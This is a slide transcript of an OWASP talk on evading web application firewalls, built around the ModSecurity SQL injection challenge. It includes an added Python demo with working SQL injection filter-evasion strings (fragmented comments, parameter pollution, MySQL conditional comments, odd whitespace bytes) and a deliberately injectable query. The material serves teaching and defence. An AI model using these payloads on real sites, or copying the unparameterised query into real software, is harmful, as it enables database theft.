[owasp-bulgaria] g. geshev - web application firewalls from an attacker's perspective

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Plan - Strawman G. Geshev Chapter Leader [email protected] +359-884-237-207 03.04.10

Upload: g-geshev

Post on 11-Nov-2014


TRANSCRIPT

  • 3. Can't get there from here? The web application firewall from an attacker's perspective. Georgi Geshev, OWASP Bulgaria Leader, [email protected], +359-884-237-207, 03.04.10. Copyright The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 5. Agenda. Part 1: Introduction. Why would you be interested in bypassing a WAF? Part 2: Real-World Stories. The ModSecurity SQL Injection Challenge.
  • 10. Who's Who? Just in case you give a darn sh*t. About me: FOSS evangelist, Offsec enthusiast, Bug hunter, Internet troll.
  • 15. Bypassing WAFs for fun and... Why would you hack around a WAF? Vulnerability assessment. Penetration testing scenario. Improving your own product. Just for fun? ;)
  • 21. What about the challenge? This is a SQL Injection and Filter Evasion Challenge. Intentionally broken demo sites. The attacker's traffic is passed through a WAF proxy. Identify a SQL injection vector within the target site. Find out if there's a way to hack around the WAF proxy.
  • 22. What about the challenge? (cont.) Targets (the scanner vendors' intentionally broken demo sites): IBM (AppScan), Cenzic (HailStorm), HP (WebInspect), Acunetix (Acunetix).
  • 24. Challenge Scenario: Hacker -> ModSecurity Proxy -> Targets.
  • 29. Objectives. Successfully enumerate the following information: Database Username(s), Database Name(s), Table Name(s), Column Name(s).
  • 33. What about the challenge? (cont.) Levels: There are two levels. We focus on the second one. Level 1: Speed Hacking. Level 2: Filter Evasion.
  • 34. The Winners: Johannes Dahse, Vladimir Vorontsov, PT Research, Ahmad Maulana, Travis Lee, Roberto Salgado, SQLMap Developers, HackPlayers, Georgi Geshev.
  • 35. What about the techniques?
    - Less known and version-specific features. Ex.: MySQL comment extensions for conditional code execution.
    - Mixture of (unterminated) comments. Ex.: double dash, C-style comments, etc.
    - Splitting the query across multiple locations. Ex.: multiple GET/POST parameters.
    - Parameter pollution, a.k.a. HPP.
    - Less known attack vector locations. Ex.: cookies, file names/contents, etc.
    - Mixture of space separators and CR/LFs. Ex.: %09, %0a, %0b, %0c, %0d, %a0.
  • 36. Examples (pt. 1): Injection Fragmentation. Splitting up the SQLi payload so that no individual fragment triggers a filter on its own; once the fragments are placed into the back-end SQL query they combine to force the boolean logic (true/false) the attacker wants.
  • 37. Examples (pt. 2): HTTP Parameter Pollution. HPP lets an attacker leverage how ASP/ASP.NET-based applications treat multiple parameters with the same name: the values are concatenated into one string, separated by commas.
  • 38. Examples (pt. 3): Tricky Comments. The intruder was able to leverage platform- and version-specific attack techniques, exploiting the way the back-end database handles and interprets different types of comments.
  • 39. Examples (pt. 4): Unusual Locations. In this case, the evasion was possible because of the attack vector location: request Cookie data.
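The slides on techniques and the four example classes (fragmentation, HPP, comment tricks, separator tricks) describe what the WAF sees versus what the database parses. The following is an added example, not from the talk or from the ModSecurity challenge: a toy per-parameter blacklist "WAF" in front of a deliberately injectable query, run against an in-memory SQLite table. The filter signature, the sample users table, the ASP.NET-style comma join of duplicate parameters, and the `mysql_view` approximation of MySQL's comment and whitespace handling are all constructed here for illustration; SQLite stands in for the real back end, so the MySQL-specific cases are normalised first and then executed as plain SQL.

```python
"""Added example: why per-argument signature filtering misses fragmented,
polluted and comment/whitespace-obfuscated SQL injection. Everything here
(filter, app, data, lexer approximation) is constructed for illustration."""
import re
import sqlite3
from urllib.parse import parse_qsl

# Signature in the style of an ASCII-only rule: a boolean tautology or
# UNION SELECT, with whitespace spelled out as the usual four bytes.
# (Older PCRE \s did not match VT 0x0b and never matched 0xa0 without UTF mode.)
WS = r"[ \t\r\n]"
SIG = re.compile(rf"\b(?:or|and){WS}+\d+{WS}*={WS}*\d+|\bunion{WS}+select\b", re.I)

def params(qs):
    # latin-1 so that %a0 survives as the byte MySQL's lexer treats as whitespace
    return parse_qsl(qs, keep_blank_values=True, encoding="latin-1")

def waf_blocks(qs):
    """Inspect each argument on its own, as a rule over ARGS:* would."""
    return any(SIG.search(v) for _, v in params(qs))

def aspnet_value(qs, name):
    """Request.QueryString[name] semantics: duplicate names joined by ','."""
    return ",".join(v for k, v in params(qs) if k == name)

MYSQL_WS_RE = re.compile("[\t\n\x0b\x0c\r \xa0]+")  # MySQL lexer separators

def mysql_view(sql, version=50500):
    """Approximate what MySQL's parser sees: /*!NNNNN ... */ is unwrapped when
    the server version is >= NNNNN, any other comment acts as a separator,
    and all lexer whitespace collapses to a single space."""
    def cond(m):
        need = int(m.group(1) or 0)
        return f" {m.group(2)} " if version >= need else " "
    sql = re.sub(r"/\*!(\d{5})?(.*?)\*/", cond, sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return MYSQL_WS_RE.sub(" ", sql).strip()

def connect():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, role TEXT, active INTEGER);
        INSERT INTO users VALUES (1,'alice','user',1),(2,'bob','admin',1),(3,'eve','user',0);
    """)
    return con

def names(con, sql):
    """Run the (deliberately unparameterised) query; return the name column."""
    return [row[1] for row in con.execute(sql)]

def fragmented_app(qs):
    """Three parameters, one statement: each fragment is harmless alone."""
    p = dict(params(qs))
    sql = (f"SELECT id,name FROM users WHERE id={p['id']} "
           f"AND role='{p['role']}' AND active={p['active']}")
    return names(connect(), sql)

def hpp_app(qs):
    """ASP.NET-style back end: the WAF sees three 'id' values, the app sees one."""
    return names(connect(), f"SELECT id,name FROM users WHERE id={aspnet_value(qs, 'id')}")

def mysql_app(qs):
    """Stand-in for a MySQL back end: normalise as MySQL's lexer would,
    then execute the resulting plain SQL on SQLite."""
    p = dict(params(qs))
    return names(connect(), mysql_view(f"SELECT id,name FROM users WHERE id={p['id']}"))

# Constructed request query strings, one per evasion class on the slides.
CASES = {
    "baseline":     ("id=1 or 1=1&role=user&active=1", fragmented_app),
    "fragmented":   ("id=1/*&role=*/or/*&active=*/1=1", fragmented_app),
    "hpp":          ("id=1/*&id=*/or/*&id=*/1=1", hpp_app),
    "cond-comment": ("id=1 UNION/*!50000 SELECT*/1,role FROM users", mysql_app),
    "vt-nbsp":      ("id=1%0bor%a01=1", mysql_app),
}

def evaluate():
    """For each case: (blocked by the WAF?, names the back end returned)."""
    out = {}
    for k, (qs, app) in CASES.items():
        blocked = waf_blocks(qs)
        out[k] = (blocked, None if blocked else app(qs))
    return out

if __name__ == "__main__":
    for k, (blocked, rows) in evaluate().items():
        print(f"{k:13} blocked={blocked!s:5} rows={rows}")
```

Only the baseline `or 1=1` is stopped; every other case passes the per-argument check and still returns the whole table (or, for the conditional-comment UNION, the role column), because the filter and the parser disagree about where a token ends. The practical lesson for the defender is the same one the challenge drew: normalise the request the way the back end will (join duplicate parameters, strip comments, fold every whitespace byte the database accepts) before matching signatures, and inspect cookies and other locations the application actually reads from.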
  • 40. Statistics
    - Estimated number of participants: >650
    - Avg. number of requests to find an evasion: 433
    - Avg. duration (time to find an evasion): 72 hrs
    - Shortest number of requests to find an evasion: 118
    - Shortest duration (time to find an evasion): 10 hrs
  • 41. Shout outs go to... All the OWASP enthusiasts around the globe, for being awesome. Ryan Barnett, for all the efforts. P. Serafimov, for kindly contributing to this talk ;)
  • 42. References. OWASP ModSecurity Core Rule Set Project: http://goo.gl/H3f49 Challenge Announce: http://goo.gl/88EDL Lessons Learned: http://goo.gl/gWLNP
  • 43. Thanks for your time! P.S. Ping me for OWASP stickers.